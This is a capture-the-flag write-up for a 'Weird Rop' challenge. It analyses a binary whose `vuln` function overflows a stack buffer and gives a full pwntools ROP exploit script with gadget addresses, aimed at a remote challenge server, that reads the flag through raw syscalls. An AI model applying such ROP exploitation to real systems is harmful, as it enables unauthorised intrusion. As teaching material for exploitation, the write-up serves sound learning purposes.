# Weird Rop

## Challenge files
We're given a statically linked, non-pie binary. I first opened it in Ghidra, but after I realized that it was written in assembly, I switched to cutter/iaito/whatever the heck that's called now.

## Analysis
The binary contains two functions, `weird_function_please_ignore` (which is full of ROP gadgets) and `vuln`. `vuln` makes syscalls directly instead of using library functions. Manually decompiled, it's roughly
```c
char buf[2];
register int x = open("/flag.txt", 2);
buf[0] = x + '0';
buf[1] = '\n';
write(stdout, buf, 2);
read(stdin, buf, 200);
```
So basically it opens the flag, prints out the corresponding file descriptor, and then smashes the stack with whatever we want (as long as it's less than 200 bytes).

## Solution
We need to do ROP to do the following:
```
set rdi to 3
leave rsi alone
set rdx to 24
set rax to 0
syscall

set rdi to 1
leave rsi alone
set rdx to 24
set rax to 1
syscall
```
The problem is that the gadgets for setting rdi are scuffed. We can only set it to 1 and then xor it with a selection of random numbers. I wrote a quick python script to brute force a combination of 3 xors that brought it to 5 (the file descriptor number I got when I nc'ed to the program):

```py
import itertools

values = [0x16b, 0x188, 0x198, 0x19b, 0x1a3, 0x1a9, 0x1d, 0x1e5, 0x1f4, 0x237, 0x25, 0x274, 0x281, 0x28e, 0x29a, 0x2b3, 0x30c, 0x314, 0x32e, 0x355, 0x3ab, 0x3cd, 0x53, 0x56, 0x6f, 0xc1]

results = dict()
for comb in itertools.product(values, repeat=3):
    result = 1
    for val in comb:
        result ^= val
    if result >= 5 and result <= 15:
        print(" ^ ".join([hex(val) for val in comb]) + " => " + str(result))
```

Then it's just manual ROP. The full solution is:

```py
from pwn import *

context.arch = "amd64"
context.aslr = True
context.terminal = ["tilix", "-e"]

# rsi is buffer
# 24 bytes useless space on stack before return address
# set rdi to 3 (puzzle)
# leave rsi alone
# set rdx to 24 (we have a pop)
# set rax to 0 (mov)
# syscall

# set rdi to 1 (mov)
# leave rsi alone
# set rdx to 24 (we have a pop)
# set rax to 1 (mov)
# syscall

binary = ELF("./weird-rop")
vuln = p64(0x004010e0)
syscall = p64(0x004010db)
rax0 = p64(0x00401002)
#rax1 = p64(0x0040100a) # can't use that one, it has a newline in it!
# actually maybe you can, idk I didn't try
rax1 = p64(0x0040100b)
poprdx = p64(0x004010de)
rdi1 = p64(0x00401012)
# 0x53 ^ 0x1f4 ^ 0x1a3 => 5
rdi5 = [
        rdi1,
        p64(0x0040107c),
        p64(0x004010b3),
        p64(0x004010cb)
        ]

p2 = 24 * b"A"

bufsize = 48

# read from fd 5
p2 += rax0
p2 += poprdx
p2 += p64(bufsize)
p2 += b"".join(rdi5)
p2 += syscall

# write to fd 1
p2 += rax1
p2 += poprdx
p2 += p64(bufsize)
p2 += rdi1
p2 += syscall

#conn = gdb.debug("./weird-rop")
conn = remote("35.224.135.84", 1000)

#conn.sendline(p1)
conn.sendline(p2)
conn.interactive()
```
